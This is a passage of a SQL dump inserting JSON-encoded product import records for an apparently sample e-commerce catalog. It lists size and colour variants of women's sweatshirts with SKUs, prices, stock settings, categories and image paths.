use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1094\":{\"sku\":\"WH08-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-L-Purple\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1095\":{\"sku\":\"WH08-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-L-White\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1096\":{\"sku\":\"WH08-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-XL-Orange\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1097\":{\"sku\":\"WH08-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-XL-Purple\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1098\":{\"sku\":\"WH08-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-XL-White\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1099\":{\"sku\":\"WH08\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Full zip,material=Nylon|Cotton|Spandex,pattern=Solid,climate=All-weather|Cool|Indoor|Mild|Spring,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH08-XS-Orange,size=XS,color=Orange|sku=WH08-XS-Purple,size=XS,color=Purple|sku=WH08-XS-White,size=XS,color=White|sku=WH08-S-Orange,size=S,color=Orange|sku=WH08-S-Purple,size=S,color=Purple|sku=WH08-S-White,size=S,color=White|sku=WH08-M-Orange,size=M,color=Orange|sku=WH08-M-Purple,size=M,color=Purple|sku=WH08-M-White,size=M,color=White|sku=WH08-L-Orange,size=L,color=Orange|sku=WH08-L-Purple,size=L,color=Purple|sku=WH08-L-White,size=L,color=White|sku=WH08-XL-Orange,size=XL,color=Orange|sku=WH08-XL-Purple,size=XL,color=Purple|sku=WH08-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Full zip\",\"material\":\"Nylon|Cotton|Spandex\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(12, 'catalog_product', 'append', '{\"1100\":{\"sku\":\"WH09-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-XS-Green\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1101\":{\"sku\":\"WH09-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Ariel Roll Sleeve Sweatshirt-XS-Purple\",\"description\":\"<p>Soft, sleek and subtle, the Ariel Roll Sleeve Sweatshirt is a nuanced fitness garment for all occasions. It works equally well as a workout piece or in a casual social setting.<\\/p>\\n<p>&bull; Purple two-tone lightweight hoodie. <br \\/>&bull; 100% cotton.<br \\/>&bull; Adjustable roll sleeves for Long-Sleeve or 3\\/4 sleeve.<br \\/>&bull; Casual, comfy piece for running errands or weekend activities.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ariel-roll-sleeve-sweatshirt-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh09-purple_alt1.jpg,\\/w\\/h\\/wh09-purple_back.jpg\",\"image\":\"